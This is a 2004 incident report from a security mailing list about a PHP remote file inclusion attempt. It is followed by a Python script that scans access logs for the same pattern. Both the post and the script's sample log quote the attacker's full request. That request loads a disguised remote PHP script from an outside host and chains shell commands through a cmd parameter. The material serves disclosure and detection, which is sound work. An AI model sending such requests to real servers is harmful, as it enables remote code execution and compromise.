Data Cha0s PHP script attempt
From: Kirby Angell (kangell_at_alertra.com)
Date: 10/02/04
- Previous message: James C Slora Jr: "RE: Localhost packets on WAN"
- Next in thread: Pall Thayer: "Re: Data Cha0s PHP script attempt"
- Reply: Pall Thayer: "Re: Data Cha0s PHP script attempt"
Date: Fri, 01 Oct 2004 22:51:51 -0500
To: Incidents List <incidents@securityfocus.com>
Source IP: 200.203.109.237
Attack: PHP form variable include
Twice tonight our web server received URL requests like this:
GET /uptime.php?pin=http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg?&cmd=ls%20/;uname%20-a;w HTTP/1.0
Host: uptime.alertra.com
User-Agent: lwp-trivial/1.35
The attack attempts to trick the uptime.php form into loading the given
URL through one of the form variables. Our forms are highly paranoid,
so that didn't work. Of interest though, if you haven't seen it (and I
hadn't) is the script they tried to download:
http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg
which isn't a JPG at all, but itself is a PHP page. I guess they
thought that our "pin" variable was used in an "include" statement. The
rogue PHP script does all sorts of interesting things such as running
commands (as in the attack above), gathering intelligence, attempting
exploits, and setting up back doors.
The script is apparently not too recent. It won't work on any default
PHP install version 4.2 and above because it assumes the variables
passed to it will be converted to global variables (see:
http://www.php.net/manual/en/security.globals.php). Recent versions of
PHP no longer do this.
The attacking IP seems to be a radio station in Brazil. I have sent an
e-mail to them informing them that they are probably compromised.
I couldn't find much information about "lwp-trivial", but it seems to be
not good for anything but badness. I guess I'll have to look into
banning bots like this from our web server altogether.
--
Thank you,
Kirby Angell
Get notified anytime your website goes down!
http://www.alertra.com
key: 9004F4C0
fingerprint: DD7E E88D 7F50 2A1E 229D 836A DB5B A751 9004 F4C0
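One way to spot the pattern described above in web server access logs, as an added example that is not part of the original post: a Python check that flags any request whose query string carries a remote URL in a parameter (the include-via-form-variable attempt) and raises the severity when a second parameter contains shell metacharacters, as the cmd parameter does here. The log lines are constructed; the first reproduces the request quoted in the post with a made-up timestamp, the other two are benign traffic for contrast.

```python
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access log (combined log format). The first line reproduces
# the request quoted in the post; its timestamp and the other two lines are made up.
SAMPLE_LOG = """\
200.203.109.237 - - [01/Oct/2004:22:40:12 -0500] "GET /uptime.php?pin=http://www.ka0ticl4b.hpgvip.ig.com.br/cse.jpg?&cmd=ls%20/;uname%20-a;w HTTP/1.0" 200 512 "-" "lwp-trivial/1.35"
192.0.2.10 - - [01/Oct/2004:22:41:03 -0500] "GET /uptime.php?pin=1234 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.11 - - [01/Oct/2004:22:42:30 -0500] "GET /go.php?url=http://www.example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d+) \S+ "(?P<ref>[^"]*)" "(?P<ua>[^"]*)"$'
)
REMOTE_SCHEME = re.compile(r'^\s*(https?|ftp)://', re.IGNORECASE)  # value points off-host
SHELL_META = re.compile(r'[;|`&$]')                                # chaining / substitution


def split_query(query):
    """Split on '&' only and percent-decode. parse_qsl is avoided because older
    Pythons also split on ';', which would hide a 'ls /;uname -a;w' value."""
    pairs = []
    for part in query.split('&'):
        if part:
            key, _, value = part.partition('=')
            pairs.append((unquote(key), unquote(value)))
    return pairs


def find_rfi_attempts(log_text):
    """One finding per request whose query string carries a remote URL."""
    findings = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m['target'])
        params = split_query(url.query)
        remote = [k for k, v in params if REMOTE_SCHEME.match(v)]
        if not remote:
            continue
        shell = [k for k, v in params if SHELL_META.search(v)]
        # A remote URL alone may be a legitimate redirect target; a second
        # parameter carrying shell syntax is what marks the include-and-run attempt.
        findings.append({
            'ip': m['ip'], 'path': url.path, 'ua': m['ua'],
            'remote_params': remote, 'shell_params': shell,
            'severity': 'high' if shell else 'medium',
        })
    return findings
```

Running find_rfi_attempts(SAMPLE_LOG) yields a high-severity finding for the first line (pin remote, cmd shell) and a medium one for the redirect-style third line; the plain pin=1234 request is not reported.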